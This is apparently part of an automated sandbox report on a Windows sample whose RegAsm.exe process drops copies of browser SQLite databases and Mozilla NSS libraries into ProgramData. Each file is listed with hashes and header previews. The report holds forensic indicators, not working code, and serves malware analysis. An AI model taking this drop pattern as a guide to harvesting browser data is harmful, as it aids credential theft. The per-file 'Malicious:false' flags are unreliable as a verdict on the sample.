                                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\GCGDGH

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9504
                                                                              Entropy (8bit):5.512408163813622
                                                                              Encrypted:false
                                                                              SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                              MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                              SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                              SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                              SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                              Malicious:false
                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                              C:\ProgramData\FCGCGDHJEGHJ\HDGIJJ

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\HIEBAK

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.136413900497188
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\JDGCGD

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                              Category:dropped
                                                                              Size (bytes):196608
                                                                              Entropy (8bit):1.121297215059106
                                                                              Encrypted:false
                                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\KJKJJJ

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):5242880
                                                                              Entropy (8bit):0.03859996294213402
                                                                              Encrypted:false
                                                                              SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                              MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                              SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                              SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                              SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\KJKJJJ-shm

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):32768
                                                                              Entropy (8bit):0.017262956703125623
                                                                              Encrypted:false
                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                              Malicious:false
                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\KKJEBA

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):98304
                                                                              Entropy (8bit):0.08235737944063153
                                                                              Encrypted:false
                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\KKJEBA-shm

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):32768
                                                                              Entropy (8bit):0.017262956703125623
                                                                              Encrypted:false
                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                              Malicious:false
                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\freebl3.dll

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):685392
                                                                              Entropy (8bit):6.872871740790978
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: tTcrJ0HtoJ.exe, Detection: malicious, Browse
                                                                              • Filename: l2XteV3M4u.exe, Detection: malicious, Browse
                                                                              • Filename: 7067B48pY6.exe, Detection: malicious, Browse
                                                                              • Filename: kYgzDmA3j5.exe, Detection: malicious, Browse
                                                                              • Filename: 1TC3BiFJb3.exe, Detection: malicious, Browse
                                                                              • Filename: Obz5x6H28w.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exe, Detection: malicious, Browse
                                                                              • Filename: emTKrlgehA.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: HaxexQ5EjD.exe, Detection: malicious, Browse
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\mozglue.dll

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):608080
                                                                              Entropy (8bit):6.833616094889818
                                                                              Encrypted:false
                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: tTcrJ0HtoJ.exe, Detection: malicious, Browse
                                                                              • Filename: l2XteV3M4u.exe, Detection: malicious, Browse
                                                                              • Filename: 7067B48pY6.exe, Detection: malicious, Browse
                                                                              • Filename: kYgzDmA3j5.exe, Detection: malicious, Browse
                                                                              • Filename: 1TC3BiFJb3.exe, Detection: malicious, Browse
                                                                              • Filename: Obz5x6H28w.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exe, Detection: malicious, Browse
                                                                              • Filename: emTKrlgehA.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: HaxexQ5EjD.exe, Detection: malicious, Browse
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\msvcp140.dll

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):450024
                                                                              Entropy (8bit):6.673992339875127
                                                                              Encrypted:false
                                                                              SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                              MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                              SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                              SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                              SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\nss3.dll

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2046288
                                                                              Entropy (8bit):6.787733948558952
                                                                              Encrypted:false
                                                                              SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                              MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                              SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                              SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                              SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\softokn3.dll

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):257872
                                                                              Entropy (8bit):6.727482641240852
                                                                              Encrypted:false
                                                                              SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                              MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                              SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                              SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                              SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\FCGCGDHJEGHJ\vcruntime140.dll

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):80880
                                                                              Entropy (8bit):6.920480786566406
                                                                              Encrypted:false
                                                                              SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                              MD5:A37EE36B536409056A86F50E67777DD7
                                                                              SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                              SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                              SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dll

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2459136
                                                                              Entropy (8bit):6.052474106868353
                                                                              Encrypted:false
                                                                              SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                              MD5:90E744829865D57082A7F452EDC90DE5
                                                                              SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                              SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                              SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):685392
                                                                              Entropy (8bit):6.872871740790978
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):608080
                                                                              Entropy (8bit):6.833616094889818
                                                                              Encrypted:false
                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):450024
                                                                              Entropy (8bit):6.673992339875127
                                                                              Encrypted:false
                                                                              SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                              MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                              SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                              SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                              SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2046288
                                                                              Entropy (8bit):6.787733948558952
                                                                              Encrypted:false
                                                                              SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                              MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                              SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                              SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                              SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll

                                                                              Download File
